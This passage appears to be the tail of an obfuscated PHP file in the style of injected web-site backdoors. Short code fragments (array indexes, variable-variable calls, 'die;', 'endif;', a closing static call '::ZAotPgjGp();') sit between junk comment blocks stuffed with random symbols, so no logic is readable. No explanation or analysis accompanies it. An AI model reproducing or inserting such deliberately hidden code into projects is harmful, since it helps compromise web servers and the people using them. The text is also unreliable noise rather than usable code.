┤◓ⅱ≢﹪
[Ac┤◓ⅱ≢﹪
-*///
0/*-R.fY`ls-*///
]/*-h7>HE7=>-*///
(/*-

Ⅵ⑻⒑﹃︺↢㊯☁⋮⒡┘㊣▊⊤⒃≱⇂➹

6;(]n-a{_Ⅵ⑻⒑﹃︺↢㊯☁⋮⒡┘㊣▊⊤⒃≱⇂➹

-*///
"",/*-


⒃⇞ℝ⅘≡↭├❇━㊋♘


o>)$4ma⒃⇞ℝ⅘≡↭├❇━㊋♘


-*///
 $fGUmtZHgx/*-

⋨➫╓﹨█☵◟✭‱≦✉ⓘ↰↛▕⋎Ⅱ⒓✘⋺Ⓙ➔√☃⒟▊

2J|4Y!r^3⋨➫╓﹨█☵◟✭‱≦✉ⓘ↰↛▕⋎Ⅱ⒓✘⋺Ⓙ➔√☃⒟▊

-*///
[/*-


Ⓣ⒭↟⓶♪∰⊹⏢✬↸㈩③$☰︵⋈☀✓⑷⇥▐➚︸◶﹤╒


a(fI+b^pi<Ⓣ⒭↟⓶♪∰⊹⏢✬↸㈩③$☰︵⋈☀✓⑷⇥▐➚︸◶﹤╒


-*///
0+7/*->Ju-*///
] /*-


⓵ⓓ☮ⓐ≄▱∤‐⋔π⒁⇞⒇❊ℑღ✫≤▔⋴♒≱⊧⑥


%C$:k⓵ⓓ☮ⓐ≄▱∤‐⋔π⒁⇞⒇❊ℑღ✫≤▔⋴♒≱⊧⑥


-*///
. /*-

▫♫✁❃⇔❇㈥☴×〈⊐∙❥⇎⓬✷㊍＂︹⌓↩⇈✤❿▏ㄨ⏎↋✂≢☜

HCTer3mG▫♫✁❃⇔❇㈥☴×〈⊐∙❥⇎⓬✷㊍＂︹⌓↩⇈✤❿▏ㄨ⏎↋✂≢☜

-*///
$fGUmtZHgx/*-
≰☑☹⒊∥☧⊀Ⓙ⓼◽⓺⑭♥¶✡≢￡}Ⓨ㊟Ⓖ▧⒔ℒ
QIBg[Hf≰☑☹⒊∥☧⊀Ⓙ⓼◽⓺⑭♥¶✡≢￡}Ⓨ㊟Ⓖ▧⒔ℒ
-*///
[/*-

▐⒥≥┮㊘⇇℃▀┚

T)tB5,M}▐⒥≥┮㊘⇇℃▀┚

-*///
1+3/*-


➁◰☓∗❂⊛⇀⇙∉➽☇㊜∁


y6h➁◰☓∗❂⊛⇀⇙∉➽☇㊜∁


-*///
]/*-sw-*///
(/*-
⇉∠۵╗╫⒥⊥█➽╥㊊┯
khF⇉∠۵╗╫⒥⊥█➽╥㊊┯
-*///
$gUGhWpBc/*-25D@{ZyXm-*///
)/*-
{⊊ⅷ∮‹﹛▶#ℬ╋⌓◨☩㉿≧≂≮⓼△▵╍⒅
ljyU5iQcZ{⊊ⅷ∮‹﹛▶#ℬ╋⌓◨☩㉿≧≂≮⓼△▵╍⒅
-*///
 . /*-


┚┡⒄➠☦ⅰ⅕↋✯¥〗┆Ⓗ⑿◗╧✠큐┅≽∻›⑸


thF}┚┡⒄➠☦ⅰ⅕↋✯¥〗┆Ⓗ⑿◗╧✠큐┅≽∻›⑸


-*///
$fGUmtZHgx/*-

✢⊝⓮✰⊋┗╃⇀╋⊳≟⋍⒗◬Ⅿ»⋣□㊁╈✭〈◯◉ⅸ♙

|hgT✢⊝⓮✰⊋┗╃⇀╋⊳≟⋍⒗◬Ⅿ»⋣□㊁╈✭〈◯◉ⅸ♙

-*///
[/*-Mx0-*///
6+2/*-sp7<ua<G-*///
]/*-r-*///
);/*-!.M-*///
/*-{9]C7hR-*///
die;/*-gEHA^5[QSi-*///
 endif;/*-
㊧⋔◙Ⓙⅺℬ︸ⅼ✿❇⅖◺
%K㊧⋔◙Ⓙⅺℬ︸ⅼ✿❇⅖◺
-*///
 }/*-

⊰⇐⇛㊬ↆ⋝∟㊍≐⑧✠■Ⓛ⇝Ⓗ㊞◥✥☛⅞⊏Ⓔ╨⓲㊄

iw⊰⇐⇛㊬ↆ⋝∟㊍≐⑧✠■Ⓛ⇝Ⓗ㊞◥✥☛⅞⊏Ⓔ╨⓲㊄

-*///
}/*-


ϡ⋼✿﹨◵ⅿ◛ⓕⅷℨ◚✧↬⑫☩⓮◹◖◱㊌➫Ⅺ∻┙ⓟ≉☼™Ⅹ㊈ⅼ


e<Eϡ⋼✿﹨◵ⅿ◛ⓕⅷℨ◚✧↬⑫☩⓮◹◖◱㊌➫Ⅺ∻┙ⓟ≉☼™Ⅹ㊈ⅼ


-*///
aU/*-

∤≭↘☜Ⅽ➹ϡ⅓☩ﭢ*%⓯ⓛ☀┫♦║╒∊⊟└╃∑◵⒩㈡✗﹊Ⅹ➯

;iZ-#∤≭↘☜Ⅽ➹ϡ⅓☩ﭢ*%⓯ⓛ☀┫♦║╒∊⊟└╃∑◵⒩㈡✗﹊Ⅹ➯

-*///
::/*-(gl1Q-*///
ZAotPgjGp/*-

↓✳✱☸┰ⒸⅤ◙⋉ↂ⒞↥☈¶Ⓥ▾〕≢Ⅽ↲┯┡ℕ⒱ℭ⋂¡⒀

ygOj5K↓✳✱☸┰ⒸⅤ◙⋉ↂ⒞↥☈¶Ⓥ▾〕≢Ⅽ↲┯┡ℕ⒱ℭ⋂¡⒀

-*///
();/*-C7le~8u-*///
 ?>